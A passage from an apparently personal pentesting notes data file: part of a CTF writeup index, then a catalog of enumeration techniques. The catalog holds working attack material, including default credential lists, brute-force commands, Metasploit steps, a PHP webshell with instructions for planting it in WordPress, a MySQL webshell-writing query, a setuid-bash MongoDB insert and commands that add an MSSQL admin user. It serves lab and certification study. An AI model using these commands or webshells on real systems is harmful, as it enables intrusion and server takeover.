      width="100" height="100"/>         |                                                                                                                                                                                                                         [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw),
      [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys),
      [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid),
      [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group)                                                                                                                                                                                                                        |

      | 31. |                                                                                                 [Lord
      Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf)                                                                                                 |      [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/)      |      <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
      width="100" height="100"/>       |                                                                                                                                                                                           [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli),
      [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse),
      [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs),
      [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root),
      [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf)                                                                                                                                                                                           |

      | 32. |     [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png"
      width="59" height="20"/>     |               [htb#64](https://app.hackthebox.eu/machines/64)               |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                                                                                                                  [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds),
      [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers)                                                                                                                                                                                                                                                                                                                 |

      | 33. |                                                                                                      [Misdirection:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf)                                                                                                       |         [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/)         |        <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
      width="100" height="100"/>        |                                                                                                                                                                                                                       [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell),
      [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell),
      [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable)                                                                                                                                                                                                                      |

      | 34. |                                                                                                            [Moria:
      1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf)                                                                                                            |            [vh#187](https://www.vulnhub.com/entry/moria-11,187/)            |           <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png"
      width="100" height="100"/>           |                                                                                                                                                                                                                                                                                                                                                    [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts)                                                                                                                                                                                                                                                                                                                                                    |

      | 35. |                                                                                                           [Mr-Robot:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf)                                                                                                           |           [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/)           |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png"
      width="100" height="100"/>           |                                                                                                                                                                                                                                                                             [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap)                                                                                                                                                                                                                                                                             |

      | 36. |                                                                                                              [Node:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf)                                                                                                               |             [vh#252](https://www.vulnhub.com/entry/node-1,252/)             |            <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
      width="100" height="100"/>            |                                                                                                                                                                                                                                             [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs),
      [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse),
      [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid)                                                                                                                                                                                                                                            |

      | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png"
      width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png"
      width="59" height="20"/> |                [htb#6](https://app.hackthebox.eu/machines/6)                |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png"
      width="100" height="100"/>             |                                                                                                                                                                                                                                                                                                         [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec),
      [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098)                                                                                                                                                                                                                                                                                                        |

      | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png"
      width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png"
      width="59" height="20"/> |              [htb#108](https://app.hackthebox.eu/machines/108)              |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png"
      width="100" height="100"/>             |                                                                                                                                                                                                                                                                                                                    [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock),
      [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers)                                                                                                                                                                                                                                                                                                                   |

      | 39. |                                                                                                             [Year
      of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf)                                                                                                             |              [tryhackme#yotf](https://tryhackme.com/room/yotf)              |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png"
      width="100" height="100"/>               |                                                                                                                                                                                                                                                         [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http),
      [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection),
      [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path)                                                                                                                                                                                                                                                         |'
  techniques:
    enumerate:
      enumerate_app_apache:
        cli: "use directory traversal to checkout the config file:\n  /usr/local/etc/apache22/httpd.conf\n\
          \  /etc/apache2/sites-enabled/000-default.conf\n  useful when certain config\
          \ changes block enumeration\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - null
      enumerate_app_apache_tomcat:
        cli: "tomcat manager default creds:\n  tomcat:tomcat\n  admin:admin\n  admin:password\n\
          \  user:password\n  tomcat:s3cret\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - https://0xrick.github.io/hack-the-box/jerry/
      enumerate_app_coldfusion_files:
        cli: 'dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt

          '
        description: look for available sub directories and files on a coldfusion
          install
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
      enumerate_app_coldfusion_version:
        cli: 'http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl

          '
        description: find out the coldfusion install version
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42)
      enumerate_app_drupal:
        cli: "version:\n  http://<targetip>:<targetport>/CHANGELOG.txt\nbruteforce:\n\
          \  ipaddr=\"<targetip>\"; id=$(curl -s http://$ipaddr/user/ | grep \"form_build_id\"\
          \ | cut -d\"\\\"\" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt\
          \ $site http-form-post \"/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id=\"\
          $id\":Sorry\" -V\nscan:\n  /opt/droopescan/droopescan scan drupal -u http://<targetip>\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - https://zayotic.com/posts/oscp-reference/
      enumerate_app_joomla:
        cli: 'joomscan --url http://<targetip>

          '
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - https://zayotic.com/posts/oscp-reference/
      enumerate_app_mongo:
        cli: 'mongo -p -u mark scheduler => connects to mongodb as user mark and allows
          interaction with db scheduler

          use scheduler => switch db

          db.getCollectionNames() => list all collections/tables

          db.tasks.find({}) => show all entries from collection/table

          db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"})
          => insert a new entry within table tasks

          '
        description: null
        ports:
        - 27017/tcp
        - 28017/tcp
        references:
        - null
      enumerate_app_nodejs:
        cli: 'check source and look at the js files to find interesting links/apis

          use burp to spider and create a sitemap of the website

          find app.js and look for db credentials (sql/mongo)

          try ssh using db credentials

          '
        description: null
        ports:
        - null
        references:
        - null
      enumerate_app_pfsense:
        cli: 'default credentials: admin/pfsense

          '
        description: null
        ports:
        - null
        references:
        - null
      enumerate_app_phpmyadmin:
        cli: "default credentials:\n  admin/\n  admin/admin\n  root/root\n  root/password\n\
          \  root/mysql\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - null
      enumerate_app_powershell_history:
        cli: 'type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

          '
        description: For certain accounts (like `sql_svc`) that are both user and
          service accounts, we can look at the user's PowerShell history and find
          interesting information.
        ports:
        - 139/tcp
        - 445/tcp
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      enumerate_app_prtg:
        cli: "default credentials:\n  prtgadmin/prtgadmin\nconfiguration and backup\
          \ files (accessed via an open ftp/smb):\n  c:\\programdata\\paessler\\Configuration.dat\n\
          \  c:\\programdata\\paessler\\Configuration.old\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - null
      enumerate_app_unrealirc:
        cli: "msfconsole\n  use exploit/unix/irc/unreal_ircd_3281_backdoor\n  set\
          \ rhost <targetip>\n  set rport <targetport>\n  exploit\n"
        description: null
        ports:
        - 6660/tcp
        - 6661/tcp
        - 6662/tcp
        - 6663/tcp
        - 6664/tcp
        - 6665/tcp
        - 6666/tcp
        - 6667/tcp
        - 6668/tcp
        - 6669/tcp
        - 7000/tcp
        references:
        - https://snowscan.io/htb-writeup-irked/
      enumerate_app_webmin:
        cli: 'view any file - even root owned, run perl cgi scripts

          msf: auxiliary/admin/webmin/file_disclosure

          can view /etc/ldap.secret file that might give credentials

          can be used to run a perl cgi script (uploaded via some other means) to
          gain root reverse shell

          download shadow file and try cracking hashes

          download ssh authorized_keys for users (names obtained from shadow file),
          use edb:5720 and "ssh -i"

          '
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - null
      enumerate_app_wordpress:
        cli: "default creds: admin/password\nlook for phpmyadmin, plugins directories\n\
          look for wp-config.php file (via an open smb/ftp share) => contains db creds,\
          \ useful for phpmyadmin and ssh\nenumerate authors:\n  http://192.168.92.167:<targetport>/?author=1\
          \ => will show username as \"AUTHOR ARCHIVES: <username>\"\n  http://192.168.92.167:<targetport>/?author=2\
          \ => will not show username if author id is invalid\n  wpuser http://192.168.92.134/\
          \ usernames\nwpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m\n\
          bruteforce wordpress login:\n  wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed\
          \ -U elliot\n  wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt\
          \ -U admin,john\n  wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/\
          \ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot\n  hydra -l admin\
          \ -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form \"/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR\"\
          \nwordpress to shell:\n  #1 add webshell via /wp-admin/theme-editor.php?file=404.php\n\
          \    a. \"Appearance\" -> \"Editor\"\n    b. select \"404 Template\" (404.php)\n\
          \    c. add php backdoor before the `<?php get_footer(); ?>` line and click\
          \ \"Update File\"\n    d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php\n\
          \    e. run local netcat listener\n    f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99\n\
          \  #2 add webshell @ /wp-admin/\n    a. \"Appearance\" -> \"Editor\"\n \
          \   b. select \"Theme Footer\" (footer.php)\n    c. add php backdoor at\
          \ the end of file and click \"Update File\"\n    d. example php backdoor:\n\
          \      <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org)\
          \ -->\n      <?php\n        if(isset($_REQUEST['cmd'])){\n          echo\
          \ \"<pre>\";\n          $cmd = ($_REQUEST['cmd']);\n          exec($cmd,\
          \ $results);\n          foreach( $results as $r )\n          {\n       \
          \           echo $r.\"<br/>\";\n          }\n          echo \"</pre>\";\n\
          \          die;\n        }\n      ?>\n      /*Usage: http://domain/path?cmd=cat+/etc/passwd*/\n\
          \    e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd\
          \ to run commands\n    f. result will be concatenated to the end of the\
          \ page\n  #3 add webshell via media file @ /wp-admin/plugin-install.php\n\
          \    a. \"Upload plugin\" -> \"Browse\"\n    b. example php backdoor:\n\
          \      <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org)\
          \ -->\n      <?php\n        if(isset($_REQUEST['cmd'])){\n          echo\
          \ \"<pre>\";\n          $cmd = ($_REQUEST['cmd']);\n          exec($cmd,\
          \ $results);\n          foreach( $results as $r )\n          {\n       \
          \           echo $r.\"<br/>\";\n          }\n          echo \"</pre>\";\n\
          \          die;\n        }\n      ?>\n      /*Usage: http://domain/path?cmd=cat+/etc/passwd*/\n\
          \    c. plugin install might fail, but php file will be uploaded as a media\
          \ file\n    d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php\
          \ to confirm file upload\n    e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd\
          \ to run commands\n  #4 metasploit:\n    msf> use exploit/unix/webapp/wp_admin_shell_upload\n\
          \    msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169\n\
          \    msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress\n\
          \    msf exploit(unix/webapp/wp_admin_shell_upload) > set username john\n\
          \    msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma\n\
          \    msf exploit(unix/webapp/wp_admin_shell_upload) > exploit\nextract hashes\
          \ from wp mysql db and crack via john:\n  select concat_ws(':', user_login,\
          \ user_pass) from wp_users;\n  john --wordlist=/usr/share/wordlists/rockyou.txt\
          \ hashes.wp\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: Blocky
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin
          - exploit_credsreuse
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/48
          verbose_id: htb#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20190910
          infra: VulnHub
          name: 'DC: 6'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_activitymonitor
          - privesc_mysql_creds
          - privesc_sudo
          - privesc_nmap
          url: https://www.vulnhub.com/entry/dc-6,315/
          verbose_id: vh#315
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        - datetime: 20190918
          infra: VulnHub
          name: 'hackfest2016: Quaoar'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_defaultcreds
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_mysql_creds
          - privesc_credsreuse
          url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
          verbose_id: vh#180
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
      enumerate_file_modified_time_window:
        cli: 'find / -newermt 2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null

          '
        description: find files modified within a time window
        references:
        - https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/
      enumerate_nmap_initial:
        cli: 'sudo nmap -Pn -sC -sV -O -oN initial <attackerip>

          '
        description: run nmap initial scans
        references:
        - https://medium.com/@ranakhalil101
        - https://medium.com/@bondo.mike
        - https://www.jibbsec.com/tags/oscplike/
        - https://0xdf.gitlab.io/tags.html#oscp-like
      enumerate_nmap_tcp:
        cli: 'nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip>

          '
        description: run nmap full tcp scans
        references:
        - https://medium.com/@ranakhalil101
        - https://medium.com/@bondo.mike
        - https://www.jibbsec.com/tags/oscplike/
        - https://0xdf.gitlab.io/tags.html#oscp-like
      enumerate_nmap_udp:
        cli: 'nmap -Pn -sU -p- -oN udp <attackerip>

          '
        description: run nmap full udp scans
        references:
        - https://medium.com/@ranakhalil101
        - https://medium.com/@bondo.mike
        - https://www.jibbsec.com/tags/oscplike/
        - https://0xdf.gitlab.io/tags.html#oscp-like
      enumerate_proto_distcc:
        cli: 'msf: exploit/unix/misc/distcc_exec

          '
        description: null
        ports:
        - 3232/tcp
        references:
        - null
      enumerate_proto_dns:
        cli: "reverse lookup to find all hostnames associated with an ip:\n  dig +noall\
          \ +answer -x <ipaddress> @<dnsserver>\ndns enumeration:\n  dnsenum -o outputfile\
          \ -f /usr/share/dnsrecon/namelist.txt -o outputfile domain\nbruteforce:\n\
          \  nmap -p 80 --script dns-brute.nse <domain.name>\n  python dnscan.py -d\
          \ <domain.name> -w ./subdomains-10000.txt\nzone transfer:\n  dig axfr @<dnsserver>\
          \ <domain.name>\n  host -t axfr <domain.name> <dnsserver>\n  host -l <domain.name>\
          \ <dnsserver>\n"
        description: null
        ports:
        - 53/tcp
        - 53/udp
        references:
        - null
      enumerate_proto_finger:
        cli: 'finger username@<targetip>

          '
        description: null
        ports:
        - 79/tcp
        references:
        - null
      enumerate_proto_ftp:
        cli: "ftp passive mode:\n  ftp -p 192.168.92.192\nbruteforce ftp login:\n\
          \  use auxiliary/scanner/ftp/ftp_login\nmisc:\n  nmap --script=*ftp* --script-args=unsafe=1\
          \ -p 20,21 <targetip>\n  nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221\
          \ <targetip>\n  hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt\
          \ -u -f <targetip> ftp\n"
        description: check if version is vulnerable and exploit is available. check
          if anonymous access is enabled. check if read permission for sensitive files.
          check if write permission within webroot/uploads or other critical directories.
          check if ftp root directory is also http root directory and upload php reverse
          shell. remember - binary and ascii transfer mode switch
        ports:
        - 21/tcp
        references:
        - https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9
        writeups:
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
      enumerate_proto_http:
        cli: 'bash /usr/share/sparta/scripts/x11screenshot.sh <targetip>

          cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt"
          ## create wordlist by crawling webpage

          cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt"
          ## create wordlist by crawling webpage

          curl -i <targetip> ## check http response headers

          gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt
          -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"

          gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt
          -u https://<targetip>:<targetport> -s "200,204,301,307,403,500"

          gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt
          -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"

          gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt
          -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"

          gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt
          -u https://<targetip>:<targetport> -s "200,204,301,307,403,500"

          gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
          -u http://<taregtip>/ -t 20 -U <username> -P <password>

          hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get
          /

          hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head
          /

          nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner

          nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip>

          nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT]

          w3m -dump <targetip>/robots.txt

          wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt"
          ## check if server is behind a web app firewall

          wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt"
          ## check if server is behind a web app firewall

          whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt"
          ## identify web technology

          '
        description: identify web server, technology, application. identify versions.
          run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source
          code. check for default creds, lfi/rfi, sqli, wordpress
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references: []
        writeups:
        - datetime: 20200625
          infra: HackTheBox
          name: Bashed
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_python_reverseshell
          - privesc_sudo
          - privesc_cron_rootjobs
          url: https://app.hackthebox.eu/machines/118
          verbose_id: htb#118
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
        - datetime: 20200722
          infra: HackTheBox
          name: Buff
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_gymsystem_rce
          - exploit_cloudme_bof
          url: https://app.hackthebox.eu/machines/263
          verbose_id: htb#263
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
        - datetime: 20200730
          infra: TryHackMe
          name: Year of the Fox
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_http
          - exploit_command_injection
          - privesc_env_relative_path
          url: https://tryhackme.com/room/yotf
          verbose_id: tryhackme#yotf
          writeup: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20200810
          infra: VulnHub
          name: 'InfoSec Prep: OSCP'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png"
            width="100" height="100" />
          points: 10
          status: public
          tags:
          - enumerate_proto_http
          - exploit_ssh_privatekeys
          - privesc_lxc_bash
          url: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
          verbose_id: vh#508
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf
      enumerate_proto_ldap:
        cli: 'ldapsearch -x -s base -h <targetip> -p 389

          '
        description: null
        ports:
        - 389/tcp
        - 389/udp
        - 636/tcp
        references:
        - null
      enumerate_proto_mssql:
        cli: 'hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt
          -u -f <targetip> mssql

          hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt
          mssql://<targetip>

          nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip>

          nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args
          mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net
          user anderson cooper /add"

          nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args
          mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net
          localgroup administrators anderson /add"

          nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes
          --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa
          <targetip>

          '
        description: null
        ports:
        - 1433/tcp
        references:
        - null
      enumerate_proto_mysql:
        cli: "nmap --script=mysql-* <targetip>\nbruteforce:\n  hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt\
          \ -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip>\n\
          \  nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt\
          \ -vv <targetip>\ncreate a reverse shell:\n  select '<?php exec($_GET[\"\
          cmd\"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php'\n\
          udf:\n  if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file\
